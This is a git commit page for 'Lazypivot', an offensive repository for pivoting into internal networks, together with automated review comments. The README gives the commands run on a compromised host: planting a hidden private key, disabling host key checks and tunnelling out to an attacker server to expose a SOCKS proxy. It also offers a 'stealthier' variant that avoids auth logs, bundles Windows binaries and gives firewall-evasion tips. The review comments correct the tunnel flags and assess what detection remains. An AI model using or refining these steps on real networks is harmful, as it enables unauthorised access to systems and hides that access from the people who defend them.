fast release

Giulio 4 years ago
commit
9807d3fcb5
7 changed files with 82 additions and 0 deletions
  1. Readme.md (+61, -0)
  2. linux/Readme.md (+1, -0)
  3. windows/antinat.dll (binary)
  4. windows/antinat.exe (binary)
  5. windows/antinat.xml (+20, -0)
  6. windows/plink.exe (binary)
  7. windows/upload.zip (binary)

+ 61 - 0
Readme.md

@@ -0,0 +1,61 @@
+# Lazypivot
+Making pivoting into internal networks easier and faster so you can focus on the real fun :)
+
+## Principles
+The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
+A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
+
+## Linux
+### Simpler
+On our server 
+```
+useradd -m -s /bin/nologin targetname
+ssh-keygen -t ecdsa -f /tmp/sshkey  -q -N ""
+mkdir /home/targetname/.ssh
+cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
+chown -R targetname:targetname /home/targetname/.ssh
+chmod 600 /home/targetname/.ssh/authorized_keys
+cat /tmp/sshkey
+```
+
+Copy the content of /tmp/sshkey
+
+On the compromised host
+
+```
+echo "my copied sshkey" >> /tmp/.keyfile
+chmod 600 /tmp/.keyfile
+ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
+```
+
+Now on your server
+
+```
+ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
+```
+
+### Stealthier
+We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
+
+Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
+## Windows
+
+Upload the package and extract it with 7z.exe.
+
+Start the antinat binary, no admin permissions are required:
+
+```
+antinat.exe -a -cantinat.xml
+```
+
+Forward the antinat port with plink:
+
+```
+plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
+```
+
+
+## Tips
+
+ * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
+ * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
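Review bot: the two tunnel commands contradict the Principles paragraph, which says the port exposed on the compromised host is forwarded to the remote server. `-L` binds the listening port on the machine running the command, so on the compromised host `-L 22:127.0.0.1:2222` tries to bind local port 22 (privileged and already held by sshd) and forwards it towards myserver:2222, the opposite of what the server-side `ssh -D 0.0.0.0:8080 ... -p 2222` expects; likewise `plink -L 32768:127.0.0.1:8080` tries to bind 32768, the very port antinat.xml already listens on. A remote forward (`-R`, with the port pair reversed) is what the text describes; either change the flag or reword Principles. The Stealthier section should also say whose log is avoided: antinat removes the SSH login to the compromised host's sshd that the Simpler flow relies on, but the outbound `ssh -fNT` or plink process and its connection remain visible in process lists, socket tables and egress logs on that host, so "stealthier" is only relative to that one auth log. Minor: "executa" -> "execute", "any other mean" -> "means", "onn" -> "on", "Instead of using with the socks options" reads oddly (drop "with"), "User corkscrew" -> "Use corkscrew", and a blank line is missing before "## Windows".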

+ 1 - 0
linux/Readme.md

@@ -0,0 +1 @@
+Antinat linux build TODO
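Review bot: the Stealthier section of Readme.md tells the reader to "upload the provided package" for Linux, but this file records that the Linux antinat build does not exist yet; Readme.md should state that the package is Windows-only for now, or link this TODO so the gap is visible from the main document.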

BIN
windows/antinat.dll


BIN
windows/antinat.exe


+ 20 - 0
windows/antinat.xml

@@ -0,0 +1,20 @@
+<?xml version='1.0'?>
+<antinatconfig>
+	<!-- Any interface -->
+	<interface value='127.0.0.1'/>
+
+	<!-- Port to listen on -->
+	<port value='32768'/>
+
+	<!-- What security methods do we offer clients? -->
+	<authchoice>
+		<select mechanism='anonymous'/>
+		<select mechanism='chap'/>
+		<select mechanism='cleartext'/>
+	</authchoice>
+
+	<!-- Which connections should we accept or reject? -->
+	<filter>
+		<accept/>
+	</filter>
+</antinatconfig>
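Review bot: the comment `<!-- Any interface -->` does not match `<interface value='127.0.0.1'/>`, which binds loopback only; fix the comment rather than the value, because with `<select mechanism='anonymous'/>` offered and a filter that is just `<accept/>`, a client may choose anonymous authentication and any peer able to reach the port could relay through the proxy, so a non-loopback bind would turn it into an open SOCKS relay on the host. If anonymous access is the intent, the chap and cleartext selections add nothing and could be dropped to make that explicit; if it is not, remove `anonymous` and tighten the filter.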

BIN
windows/plink.exe


BIN
windows/upload.zip